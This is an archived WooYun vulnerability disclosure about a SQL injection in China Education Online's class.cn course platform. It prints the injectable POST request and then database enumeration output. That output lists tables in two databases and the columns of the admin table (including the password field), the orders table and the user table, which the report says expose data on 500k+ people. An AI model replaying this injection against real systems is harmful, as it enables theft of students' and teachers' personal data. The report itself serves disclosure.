中国教育在线某站存在SQL漏洞泄露50W+师生信息且危及主站

发表于 2015年07月02日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2015-0124024

漏洞标题：中国教育在线某站存在SQL漏洞泄露50W+师生信息且危及主站

漏洞详情

披露状态：

2015-07-02: 细节已通知厂商并且等待厂商处理中
2015-07-02: 厂商已查看当前漏洞内容,细节仅向厂商公开
2015-07-07: 厂商已经主动忽略漏洞，细节向公众公开

简要描述：

好课网是中国教育在线的在线学习平台,该平台面向学习者提供涵盖基础教育、高等教育以及行业培训等海量优质网络课程,汇聚各行业精英,你可以自由选择你所需的或者感兴趣..

详细说明：

注入点

POST /ajax/course/list_course HTTP/1.1<br>
Content-Length: 188<br>
Content-Type: application/x-www-form-urlencoded<br>
X-Requested-With: XMLHttpRequest<br>
Referer: http://www.class.cn:80/<br>
Host: www.class.cn<br>
Connection: Keep-alive<br>
Accept-Encoding: gzip,deflate<br>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21<br>
Accept: */*all_course=1&sort=publishtime-desc&tags[0]=1*&type_id=19

POST /ajax/course/list_course HTTP/1.1

Content-Length: 188

Content-Type: application/x-www-form-urlencoded

X-Requested-With: XMLHttpRequest

Referer: http://www.class.cn:80/

Host: www.class.cn

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

Accept: */*all_course=1&sort=publishtime-desc&tags[0]=1*&type_id=19

包括50W+的师生姓名，手机号，身份证号，学生订单，且包括主站的信息

漏洞证明：

主站的数据

Database: eol_study2<br>
[88 tables]<br>
+-----------------------------------+<br>
| Study_Aboutfile                   |<br>
| Study_Admin_Manage                |<br>
| Study_Coupon_Code                 |<br>
| Study_Coupon_List                 |<br>
| Study_Coupon_User_List            |<br>
| Study_Coupon_log                  |<br>
| Study_Course                      |<br>
| Study_CourseTmp                   |<br>
| Study_Course_Check_Log            |<br>
| Study_Course_Comment              |<br>
| Study_Course_DelFile_Log          |<br>
| Study_Course_Live                 |<br>
| Study_Course_LiveTmp              |<br>
| Study_Course_Note                 |<br>
| Study_Course_Num                  |<br>
| Study_Course_Scale                |<br>
| Study_Course_Section              |<br>
| Study_Course_SectionTmp           |<br>
| Study_Course_SectionTmp_Log       |<br>
| Study_Course_Section_Aboutfile    |<br>
| Study_Course_Section_Log          |<br>
| Study_Course_Section_Teacher      |<br>
| Study_Course_Section_Video        |<br>
| Study_Course_Section_VideoTmp     |<br>
| Study_Course_Section_VideoTmp_Log |<br>
| Study_Course_Section_Video_Delete |<br>
| Study_Course_Section_Video_Log    |<br>
| Study_Course_Total_Scale          |<br>
| Study_Course_Type                 |<br>
| Study_Email_Send                  |<br>
| Study_Interest                    |<br>
| Study_Live_Callback_Log           |<br>
| Study_Live_Message_Log            |<br>
| Study_Live_Order_Log              |<br>
| Study_Message                     |<br>
| Study_Message_Send                |<br>
| Study_My_Collect_Course           |<br>
| Study_My_Study_Course             |<br>
| Study_Open_Uid_Map                |<br>
| Study_Order                       |<br>
| Study_Order_Audit_Log             |<br>
| Study_Order_Haoxue                |<br>
| Study_Order_Log                   |<br>
| Study_Order_Log_Dezhi             |<br>
| Study_Order_Pay_Log               |<br>
| Study_Stat_AboutFile              |<br>
| Study_Stat_CourseHits             |<br>
| Study_Stat_CourseScales           |<br>
| Study_Stat_Course_Day             |<br>
| Study_Stat_Course_Month           |<br>
| Study_Stat_Course_Week            |<br>
| Study_Stat_File_Day               |<br>
| Study_Stat_File_Month             |<br>
| Study_Stat_File_Week              |<br>
| Study_Stat_Keywords               |<br>
| Study_Stat_Keywords_Day           |<br>
| Study_Stat_Keywords_Month         |<br>
| Study_Stat_Keywords_Search        |<br>
| Study_Stat_Keywords_Week          |<br>
| Study_Stat_UserComments           |<br>
| Study_Stat_UserHits               |<br>
| Study_Stat_User_Day               |<br>
| Study_Stat_User_Month             |<br>
| Study_Stat_User_Week              |<br>
| Study_Teacher                     |<br>
| Study_User                        |<br>
| Study_User_Check_Log              |<br>
| Study_User_Comment_Log            |<br>
| Study_User_Comment_Viewtime       |<br>
| Study_User_Interest_lk            |<br>
| Study_User_Msg                    |<br>
| Study_User_Num                    |<br>
| Study_User_Organization_Apply     |<br>
| Study_User_Organization_Applytmp  |<br>
| Study_User_Pay_Apply              |<br>
| Study_User_Pay_Applytmp           |<br>
| Study_User_Person_Apply           |<br>
| Study_User_Person_Applytmp        |<br>
| Study_User_Rakeback_Set           |<br>
| Study_User_Weibo                  |<br>
| Study_Void_Generator              |<br>
| ci_sessions                       |<br>
| class_active                      |<br>
| class_cart                        |<br>
| class_tag_course                  |<br>
| class_tag_course_type             |<br>
| class_tag_list                    |<br>
| daemon                            |<br>
+-----------------------------------+

Database: eol_study2

[88 tables]

+-----------------------------------+

| Study_Aboutfile |

| Study_Admin_Manage |

| Study_Coupon_Code |

| Study_Coupon_List |

| Study_Coupon_User_List |

| Study_Coupon_log |

| Study_Course |

| Study_CourseTmp |

| Study_Course_Check_Log |

| Study_Course_Comment |

| Study_Course_DelFile_Log |

| Study_Course_Live |

| Study_Course_LiveTmp |

| Study_Course_Note |

| Study_Course_Num |

| Study_Course_Scale |

| Study_Course_Section |

| Study_Course_SectionTmp |

| Study_Course_SectionTmp_Log |

| Study_Course_Section_Aboutfile |

| Study_Course_Section_Log |

| Study_Course_Section_Teacher |

| Study_Course_Section_Video |

| Study_Course_Section_VideoTmp |

| Study_Course_Section_VideoTmp_Log |

| Study_Course_Section_Video_Delete |

| Study_Course_Section_Video_Log |

| Study_Course_Total_Scale |

| Study_Course_Type |

| Study_Email_Send |

| Study_Interest |

| Study_Live_Callback_Log |

| Study_Live_Message_Log |

| Study_Live_Order_Log |

| Study_Message |

| Study_Message_Send |

| Study_My_Collect_Course |

| Study_My_Study_Course |

| Study_Open_Uid_Map |

| Study_Order |

| Study_Order_Audit_Log |

| Study_Order_Haoxue |

| Study_Order_Log |

| Study_Order_Log_Dezhi |

| Study_Order_Pay_Log |

| Study_Stat_AboutFile |

| Study_Stat_CourseHits |

| Study_Stat_CourseScales |

| Study_Stat_Course_Day |

| Study_Stat_Course_Month |

| Study_Stat_Course_Week |

| Study_Stat_File_Day |

| Study_Stat_File_Month |

| Study_Stat_File_Week |

| Study_Stat_Keywords |

| Study_Stat_Keywords_Day |

| Study_Stat_Keywords_Month |

| Study_Stat_Keywords_Search |

| Study_Stat_Keywords_Week |

| Study_Stat_UserComments |

| Study_Stat_UserHits |

| Study_Stat_User_Day |

| Study_Stat_User_Month |

| Study_Stat_User_Week |

| Study_Teacher |

| Study_User |

| Study_User_Check_Log |

| Study_User_Comment_Log |

| Study_User_Comment_Viewtime |

| Study_User_Interest_lk |

| Study_User_Msg |

| Study_User_Num |

| Study_User_Organization_Apply |

| Study_User_Organization_Applytmp |

| Study_User_Pay_Apply |

| Study_User_Pay_Applytmp |

| Study_User_Person_Apply |

| Study_User_Person_Applytmp |

| Study_User_Rakeback_Set |

| Study_User_Weibo |

| Study_Void_Generator |

| ci_sessions |

| class_active |

| class_cart |

| class_tag_course |

| class_tag_course_type |

| class_tag_list |

| daemon |

+-----------------------------------+

Database: eol_study2<br>
Table: Study_Admin_Manage<br>
[8 columns]<br>
+-----------+-------------+<br>
| Column    | Type        |<br>
+-----------+-------------+<br>
| Id        | int(11)     |<br>
| LastIp    | varchar(20) |<br>
| LastLogin | datetime    |<br>
| LoginNum  | int(11)     |<br>
| Name      | varchar(20) |<br>
| PassWord  | varchar(50) |<br>
| Status    | tinyint(4)  |<br>
| Suser     | tinyint(4)  |

Database: eol_study2

Table: Study_Admin_Manage

[8 columns]

+-----------+-------------+

| Column | Type |

+-----------+-------------+

| Id | int(11) |

| LastIp | varchar(20) |

| LastLogin | datetime |

| LoginNum | int(11) |

| Name | varchar(20) |

| PassWord | varchar(50) |

| Status | tinyint(4) |

| Suser | tinyint(4) |

50W+师生信息

Database: class_cn<br>
[94 tables]<br>
+---------------------------------------+<br>
| ci_sessions                           |<br>
| class_active                          |<br>
| class_admin_function                  |<br>
| class_admin_group                     |<br>
| class_admin_group_function            |<br>
| class_admin_member                    |<br>
| class_admin_member_function           |<br>
| class_app_course_type                 |<br>
| class_app_feedback                    |<br>
| class_app_version                     |<br>
| class_cart                            |<br>
| class_ccback_section_filename         |<br>
| class_cooperation_order               |<br>
| class_coupon_list                     |<br>
| class_coupon_op_log                   |<br>
| class_coupon_public_code              |<br>
| class_coupon_single_code              |<br>
| class_coupon_user_list                |<br>
| class_course_amount                   |<br>
| class_course_cc_video_undel           |<br>
| class_course_chapter                  |<br>
| class_course_chapter_section          |<br>
| class_course_check                    |<br>
| class_course_comment                  |<br>
| class_course_detail                   |<br>
| class_course_guide_doc                |<br>
| class_course_list                     |<br>
| class_course_note                     |<br>
| class_course_rate                     |<br>
| class_course_rate_detail              |<br>
| class_course_section                  |<br>
| class_course_section_check            |<br>
| class_course_section_guide_doc        |<br>
| class_course_section_multi            |<br>
| class_course_section_teacher          |<br>
| class_course_type                     |<br>
| class_course_user_recommend           |<br>
| class_email_send                      |<br>
| class_live_course                     |<br>
| class_live_course_check               |<br>
| class_live_order                      |<br>
| class_logs_coupon                     |<br>
| class_logs_course_chapter_section_del |<br>
| class_logs_course_check               |<br>
| class_logs_course_delfile             |<br>
| class_logs_course_section             |<br>
| class_logs_course_section_check_del   |<br>
| class_logs_course_section_multi_del   |<br>
| class_logs_course_update              |<br>
| class_logs_live_callback              |<br>
| class_logs_live_course                |<br>
| class_logs_live_course_del            |<br>
| class_logs_live_message               |<br>
| class_logs_order_charge_back          |<br>
| class_logs_order_check                |<br>
| class_logs_protocal_change            |<br>
| class_logs_transcoder                 |<br>
| class_logs_user_change                |<br>
| class_logs_user_check                 |<br>
| class_message                         |<br>
| class_message_send                    |<br>
| class_offline_protocol                |<br>
| class_open_uid_map                    |<br>
| class_order                           |<br>
| class_order_dezhi                     |<br>
| class_order_haoxue                    |<br>
| class_order_log                       |<br>
| class_order_pay_log                   |<br>
| class_promote_course                  |<br>
| class_promote_course_check            |<br>
| class_promote_list                    |<br>
| class_statistic_total                 |<br>
| class_tag_course                      |<br>
| class_tag_course_type                 |<br>
| class_tag_list                        |<br>
| class_user                            |<br>
| class_user_comment                    |<br>
| class_user_comment_viewtimes          |<br>
| class_user_favorites_course           |<br>
| class_user_msg                        |<br>
| class_user_num                        |<br>
| class_user_org_cert                   |<br>
| class_user_org_cert_check             |<br>
| class_user_pay_request                |<br>
| class_user_pay_request_check          |<br>
| class_user_person_cert                |<br>
| class_user_person_cert_check          |<br>
| class_user_ratio_set                  |<br>
| class_user_settle                     |<br>
| class_user_settle_order               |<br>
| class_user_study_course               |<br>
| class_user_teacher                    |<br>
| class_user_weibo                      |<br>
| class_void_generator                  |<br>
+---------------------------------------+

Database: class_cn

[94 tables]

+---------------------------------------+

| ci_sessions |

| class_active |

| class_admin_function |

| class_admin_group |

| class_admin_group_function |

| class_admin_member |

| class_admin_member_function |

| class_app_course_type |

| class_app_feedback |

| class_app_version |

| class_cart |

| class_ccback_section_filename |

| class_cooperation_order |

| class_coupon_list |

| class_coupon_op_log |

| class_coupon_public_code |

| class_coupon_single_code |

| class_coupon_user_list |

| class_course_amount |

| class_course_cc_video_undel |

| class_course_chapter |

| class_course_chapter_section |

| class_course_check |

| class_course_comment |

| class_course_detail |

| class_course_guide_doc |

| class_course_list |

| class_course_note |

| class_course_rate |

| class_course_rate_detail |

| class_course_section |

| class_course_section_check |

| class_course_section_guide_doc |

| class_course_section_multi |

| class_course_section_teacher |

| class_course_type |

| class_course_user_recommend |

| class_email_send |

| class_live_course |

| class_live_course_check |

| class_live_order |

| class_logs_coupon |

| class_logs_course_chapter_section_del |

| class_logs_course_check |

| class_logs_course_delfile |

| class_logs_course_section |

| class_logs_course_section_check_del |

| class_logs_course_section_multi_del |

| class_logs_course_update |

| class_logs_live_callback |

| class_logs_live_course |

| class_logs_live_course_del |

| class_logs_live_message |

| class_logs_order_charge_back |

| class_logs_order_check |

| class_logs_protocal_change |

| class_logs_transcoder |

| class_logs_user_change |

| class_logs_user_check |

| class_message |

| class_message_send |

| class_offline_protocol |

| class_open_uid_map |

| class_order |

| class_order_dezhi |

| class_order_haoxue |

| class_order_log |

| class_order_pay_log |

| class_promote_course |

| class_promote_course_check |

| class_promote_list |

| class_statistic_total |

| class_tag_course |

| class_tag_course_type |

| class_tag_list |

| class_user |

| class_user_comment |

| class_user_comment_viewtimes |

| class_user_favorites_course |

| class_user_msg |

| class_user_num |

| class_user_org_cert |

| class_user_org_cert_check |

| class_user_pay_request |

| class_user_pay_request_check |

| class_user_person_cert |

| class_user_person_cert_check |

| class_user_ratio_set |

| class_user_settle |

| class_user_settle_order |

| class_user_study_course |

| class_user_teacher |

| class_user_weibo |

| class_void_generator |

+---------------------------------------+

订单详情

Database: class_cn<br>
Table: class_order<br>
[19 columns]<br>
+----------------+---------------------+<br>
| Column         | Type                |<br>
+----------------+---------------------+<br>
| back_time      | datetime            |<br>
| close_pay      | decimal(10,2)       |<br>
| close_status   | tinyint(2) unsigned |<br>
| close_time     | datetime            |<br>
| course_id      | int(11) unsigned    |<br>
| create_time    | timestamp           |<br>
| create_user_id | int(11) unsigned    |<br>
| due_pay        | decimal(10,2)       |<br>
| expend_type    | tinyint(4) unsigned |<br>
| ip             | char(15)            |<br>
| is_back        | tinyint(2) unsigned |<br>
| oid            | char(16)            |<br>
| order_status   | tinyint(2) unsigned |<br>
| order_user_id  | int(11) unsigned    |<br>
| pay            | decimal(10,2)       |<br>
| pay_flag       | tinyint(3) unsigned |<br>
| pay_time       | datetime            |<br>
| source         | tinyint(1) unsigned |<br>
| void           | bigint(20)          |<br>
+----------------+---------------------+

Database: class_cn

Table: class_order

[19 columns]

+----------------+---------------------+

| Column | Type |

+----------------+---------------------+

| back_time | datetime |

| close_pay | decimal(10,2) |

| close_status | tinyint(2) unsigned |

| close_time | datetime |

| course_id | int(11) unsigned |

| create_time | timestamp |

| create_user_id | int(11) unsigned |

| due_pay | decimal(10,2) |

| expend_type | tinyint(4) unsigned |

| ip | char(15) |

| is_back | tinyint(2) unsigned |

| oid | char(16) |

| order_status | tinyint(2) unsigned |

| order_user_id | int(11) unsigned |

| pay | decimal(10,2) |

| pay_flag | tinyint(3) unsigned |

| pay_time | datetime |

| source | tinyint(1) unsigned |

| void | bigint(20) |

+----------------+---------------------+

用户信息

Database: class_cn<br>
Table: class_user<br>
[34 columns]<br>
+----------------+---------------------+<br>
| Column         | Type                |<br>
+----------------+---------------------+<br>
| bad_comment    | int(11) unsigned    |<br>
| contact_email  | varchar(50)         |<br>
| create_time    | timestamp           |<br>
| email          | varchar(100)        |<br>
| gender         | enum('0','1','2')   |<br>
| good_comment   | int(11) unsigned    |<br>
| head_img       | varchar(200)        |<br>
| interest       | varchar(1000)       |<br>
| intro          | text                |<br>
| is_check       | tinyint(2)          |<br>
| is_pub_email   | tinyint(2)          |<br>
| is_pub_mobile  | tinyint(2)          |<br>
| is_pub_qq      | tinyint(2)          |<br>
| is_pub_tel     | tinyint(2)          |<br>
| is_pub_website | tinyint(2)          |<br>
| is_pub_weibo   | tinyint(2)          |<br>
| login_ip       | varchar(20)         |<br>
| login_num      | int(11)             |<br>
| login_time     | datetime            |<br>
| mobile         | char(11)            |<br>
| nick_name      | varchar(100)        |<br>
| old_head_img   | varchar(100)        |<br>
| pay_status     | tinyint(2) unsigned |<br>
| qq             | varchar(20)         |<br>
| rand_code      | varchar(32)         |<br>
| real_name      | varchar(50)         |<br>
| source         | varchar(10)         |<br>
| status         | tinyint(2)          |<br>
| tel            | varchar(20)         |<br>
| up_time        | datetime            |<br>
| user_id        | int(11)             |<br>
| user_type      | tinyint(2)          |<br>
| website        | varchar(200)        |<br>
| weibo          | varchar(100)        |<br>
+----------------+---------------------+